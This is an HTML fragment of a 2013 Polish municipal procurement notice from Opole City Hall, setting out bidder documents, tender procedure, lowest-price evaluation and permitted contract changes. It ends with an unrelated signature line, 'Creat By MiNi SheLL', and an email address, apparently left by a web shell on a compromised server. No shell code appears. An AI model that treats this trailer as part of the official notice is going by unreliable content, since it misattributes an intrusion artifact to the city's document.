Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie            z treści oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach określonych poszczególnymi postanowieniami  niniejszej umowy oraz w przypadku:
a)zmiany przepisów prawnych mających wpływ na realizację umowy, a w szczególności na jej zakres i termin,
b)zmiany przepisów prawnych mających wpływ na cenę umowy, a w szczególności zmiany podatku VAT, wprowadzenia akcyzy,
c)zmiany nazwy, adresu Wykonawcy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą,
d)zmiany osób przewidzianych do kierowania, nadzorowania prac wymienionych w ofercie i umowie, za uprzednią zgodą Zamawiającego,
e)Zmiany terminu wykonania prac:
spowodowanej przedłużeniem z przyczyn niezależnych od Wykonawcy, czasu wydania decyzji administracyjnych przez właściwe organy lub inne podmioty w stosunku do terminów wynikających z obowiązujących przepisów prawa, jeżeli uniemożliwia to lub wstrzymuje w istotny sposób realizację prac,
spowodowanej wystąpieniem sytuacji niemożliwej do przewidzenia w chwili zawarcia umowy, a mającej wpływ na realizację prac. 
Warunkiem zmiany umowy będzie udokumentowany wniosek, a zmiana może nastąpić w przypadku, gdy jej wprowadzenie jest konieczne dla prawidłowej realizacji zamówienia. 

Zamawiający zastrzega możliwość, w przypadku zaistnienia okoliczności określonych w § 8 ust. 2  wzoru umowy mogących skutkować niemożnością dochowania terminu, o którym mowa w § 2 ust. 1 lit. b), do podjęcia decyzji o zmianie terminu określonego w § 2 ust. 1 lit. b) wzoru umowy lub rozwiązania niniejszej umowy za wypowiedzeniem. Strony ustalają jednomiesięczny termin wypowiedzenia.
1.Zmiana terminu realizacji niniejszej Umowy, a tym samym terminu określonego w § 2 lit. b) wzoru umowy, może nastąpić w następujących przypadkach:
a)jeśli Zamawiający nie dostarczy Wykonawcy posiadanych materiałów lub danych niezbędnych do wykonania poszczególnych prac składających się na przedmiot niniejszej Umowy, których Wykonawca nie może uzyskać w inny sposób niż od Zamawiającego, a ich brak uniemożliwia w sposób obiektywny dochowania terminów określonych w Ramowym harmonogramie rzeczowo - finansowym stanowiącym załącznik nr 2 do niniejszej Umowy, lub
b)jeśli wynika to z przebiegu, czasu trwania oraz wymogów postępowania na wybór partnera prywatnego albo koncesjonariusza, a w szczególności terminu jego zakończenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Opola. Wydział Inwestycji Miejskich, 45-018 Opole, Plac Wolności 7-8, pokój 118.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 10:00, miejsce: Urząd Miasta Opola. Wydział Inwestycji Miejskich, 45-018 Opole, Plac Wolności 7-8, pokój 117 B..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com